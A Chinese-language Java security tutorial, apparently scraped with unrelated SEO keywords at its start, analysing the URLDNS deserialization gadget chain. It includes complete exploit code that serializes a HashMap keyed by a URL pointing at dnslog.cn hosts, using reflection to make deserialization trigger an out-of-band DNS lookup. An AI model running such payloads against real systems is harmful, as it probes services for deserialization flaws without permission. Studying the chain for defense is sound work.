WordPress网站被恶意登录,素材网站设计模板下载,有免费做理化试验的网站吗,提升排名Java安全 URLDNS链分析 什么是URLDNS链URLDNS链分析调用链路HashMap类分析URL类分析 exp编写思路整理初步expexp改进最终exp 什么是URLDNS链 URLDNS链是Java安全中比较简单的一条利用链#xff0c;无需使用任何第三方库#xff0c;全依靠Java内置的一些类实现#xff0c;但… Java安全 URLDNS链分析 什么是URLDNS链URLDNS链分析调用链路HashMap类分析URL类分析 exp编写思路整理初步expexp改进最终exp 什么是URLDNS链 URLDNS链是Java安全中比较简单的一条利用链无需使用任何第三方库全依靠Java内置的一些类实现但无法进行命令执行只能实现对URl的访问探测发起DNS请求并且不限制Java版本可以用于检测是否存在反序列化漏洞理解好URLDNS链那么接下来对CC链的学习就会简单许多 URLDNS链分析 调用链路 Gadget Chain:HashMap.readObject()HashMap.putVal()HashMap.hash()URL.hashCode() HashMap类分析 我们来到 HashMap.java文件查看HashMap类的readObject方法代码如下 private void readObject(java.io.ObjectInputStream s)throws IOException, ClassNotFoundException {// Read in the threshold (ignored), loadfactor, and any hidden stuffs.defaultReadObject();reinitialize();if (loadFactor 0 || Float.isNaN(loadFactor))throw new InvalidObjectException(Illegal load factor: loadFactor);s.readInt(); // Read and ignore number of bucketsint mappings s.readInt(); // Read number of mappings (size)if (mappings 0)throw new InvalidObjectException(Illegal mappings count: mappings);else if (mappings 0) { // (if zero, use defaults)// Size the table using given load factor only if within// range of 0.25...4.0float lf Math.min(Math.max(0.25f, loadFactor), 4.0f);float fc (float)mappings / lf 1.0f;int cap ((fc DEFAULT_INITIAL_CAPACITY) ?DEFAULT_INITIAL_CAPACITY :(fc MAXIMUM_CAPACITY) ?MAXIMUM_CAPACITY :tableSizeFor((int)fc));float ft (float)cap * lf;threshold ((cap MAXIMUM_CAPACITY ft MAXIMUM_CAPACITY) ?(int)ft : Integer.MAX_VALUE);SuppressWarnings({rawtypes,unchecked})NodeK,V[] tab (NodeK,V[])new Node[cap];table tab;// Read the keys and values, and put the mappings in the HashMapfor (int i 0; i mappings; i) {SuppressWarnings(unchecked)K key (K) s.readObject();SuppressWarnings(unchecked)V value (V) s.readObject();putVal(hash(key), key, value, false, false);}} }我们看下该方法的最后一行代码 putVal(hash(key), key, value, false, false);发现调用了对 key变量 调用了该类里里面的hash函数然后我们分析下key参数是怎么获得的 通过以下代码可以看出定义了一个K类型的key变量然后对反序列化的输入流进行反序列化并把反序列化出的键复制给key变量 K类型是代表键的泛型其定义的数据可以是任何类型但只能作为map中的键 K key (K) s.readObject();我们再看下 hash 函数是如何对key处理的我们在HashMap类中找到hash函数代码如下 static final int hash(Object key) {int h;return (key null) ? 0 : (h key.hashCode()) ^ (h 16);}经分析只要我们的key对象也就是传入map的键不为空就会执行h key.hashCode()也就是执行key对象里的hashCode()方法 URL类分析 这里接上文假设我们传入map中的key为URL对象那么便调用URL类中的hashCode()方法我们看下这个方法的代码 public synchronized int hashCode() {if (hashCode ! -1)return hashCode;hashCode handler.hashCode(this);return hashCode;}这里看到只要 hashCode -1的话那么便会执行handler.hashCode(this);我们去看下 hashcode 属性是怎么定义的 private int hashCode -1;我们发现 hashcode 的初始值为 -1也就是默认执行handler.hashCode(this);我们再去看看 handler 是怎么定义的代表了什么通过下面可得handler属性代表了URLStreamHandler类的临时对象 transient URLStreamHandler handler; //这个URL传输实现类是一个transient临时类型不会被反序列化经分析也就是把这一整个URL对象作为参数传入了URLStreamHandler类的hashCode方法 this代表的是当前对象的指针也可以用 this.name 的方式调用当前对象中的成员 那我们去URLStreamHandler类当中查看下hashCode方法的代码 protected int hashCode(URL u) {int h 0;// Generate the protocol part.String protocol u.getProtocol();if (protocol ! null)h protocol.hashCode();// Generate the host part.InetAddress addr getHostAddress(u);if (addr ! null) {h addr.hashCode();} else {String host u.getHost();if (host ! null)h host.toLowerCase().hashCode();}// Generate the file part.String file u.getFile();if (file ! null)h file.hashCode();// Generate the port part.if (u.getPort() -1)h getDefaultPort();elseh u.getPort();// Generate the ref part.String ref u.getRef();if (ref ! null)h ref.hashCode();return h;}我们看到 hashcode 方法接收一个URL类型的参数然后对接收的 URL对象也就是前面的key执行InetAddress addr getHostAddress(u);并会把求出的 hash值 返回给 URL对象中的hashCode属性这里记住下面有用到 getHostAddress函数会对URL对象代表的链接进行DNS解析获取其ip地址我们使用 DNSLog 平台可以检测到该函数的访问 exp编写 思路整理 根据上面的链路分析我们首先需要创建一个指向DNSLog平台链接的URL对象然后作为键传入HashMap数组最后将该数组进行序列化然后反序列化调用其readObject方法将URL对象赋值给key然后使用hash方法处理URL对象再调用URL对象的hashcode方法然后以URL对象为参数传入URLStreamHandler类的hashCode方法对URL对象指向的链接进行访问 初步exp 现在的exp大体如下 import java.io.*; import java.lang.reflect.Field; import java.net.URL; import java.util.HashMap;public class URLDNS {public static void main(String[] args) throws Exception {HashMap map new HashMap();URL url new URL(http://j0obud.dnslog.cn/);//这里替换为DNSLog平台分配的地址map.put(url,114);//键值用不到随便设置try {FileOutputStream outputStream new FileOutputStream(./2.ser);ObjectOutputStream outputStream1 new ObjectOutputStream(outputStream);outputStream1.writeObject(map);outputStream.close();outputStream1.close();FileInputStream inputStream new FileInputStream(./2.ser);ObjectInputStream objectInputStream new ObjectInputStream(inputStream);objectInputStream.readObject();objectInputStream.close();inputStream.close();}catch (Exception e){e.printStackTrace();}} }我们在第13行打个断点也就是try的这一行 然后运行代码发现未经序列化与反序列化仍然能对url进行DNS解析 正是下面这一行代码导致了url的提前解析 map.put(url,114);//键值用不到随便设置我们去看下map(HashMap类)的put方法代码如下 public V put(K key, V value) {return putVal(hash(key), key, value, false, true);}我们发现这个put方法和readObject方法触发的语句完全一样同样会对URL对象执行HashMap类中的hash方法然后就和上文所述的过程相同最总到达hashCode方法对URL对象解析 return putVal(hash(key), key, value, false, true);下面是这两个方法的语句对比可以看到是一模一样的 put方法 readObject方法 需要注意的是假如提前触发的话反序列化的时候便不会再进行DNS解析 我们再次回到URL类中的hashCode方法并看一下其hashCode属性的定义 private int hashCode -1; public synchronized int hashCode() {if (hashCode ! -1)return hashCode;hashCode handler.hashCode(this);return hashCode;}可以看到只有当 hashCode -1时才会执行hashCode handler.hashCode(this);从而到下一步DNS解析然后 hashCode属性被赋值为这个URL解析的哈希值从而为一个很长的正数从而不为 -1,然后序列化的时候这个hashCode属性值保持不变当反序列化到hashCode方法时以为 hashCode ! -1 直接进入if执行return hashCode;最终到这里就断掉了无法触发DNS解析 exp改进 那怎么办呢 我们可以先在put时将 hashCode 值通过反射修改为任意一个不为 -1 的数字从而不会提前触发DNS解析然后在put完成后我们再通过反射将 hashCode值设为 -1示例如下 field.set(url,123); //将url的hashcode属性改为123使其不等于-1 map.put(url,2333); //这里的value用不上随便设置 field.set(url,-1);//put完之后我们就需要将hashcode属性改回成-1从而能执行handler.hashCode(this);通过反射我们可以动态修改一个对象中的属性和方法 最终exp package org.example; import java.io.*; import java.lang.reflect.Field; import java.net.URL; import java.util.HashMap; public class URLDNS {public static void main(String[] args) throws Exception {HashMap map new HashMap();URL url new URL(http://mm4dhq.dnslog.cn/);//这里替换为DNSLog平台分配的地址Class clas url.getClass();Field field clas.getDeclaredField(hashCode);field.setAccessible(true);field.set(url,123); //将url的hashcode属性改为123使其不等于-1map.put(url,2333); //这里的value用不上随便设置field.set(url,-1);//put完之后我们就需要将hashcode属性改回成-1从而能执行handler.hashcodetry {//序列化FileOutputStream outputStream new FileOutputStream(./2.ser);ObjectOutputStream outputStream1 new ObjectOutputStream(outputStream);outputStream1.writeObject(map);outputStream.close();outputStream1.close();//反序列化此时触发dns请求FileInputStream inputStream new FileInputStream(./2.ser);ObjectInputStream objectInputStream new ObjectInputStream(inputStream);objectInputStream.readObject();objectInputStream.close();inputStream.close();}catch (Exception e){e.printStackTrace();}} }我们再次在put语句下面打断点观察是否还会提前触发可以看到DNSLog平台没有记录代表put时由于hashCode值不为 -1 没有执行handler.hashCode(this) 我们在断点处继续执行可以看到反序列化成功触发了DNS解析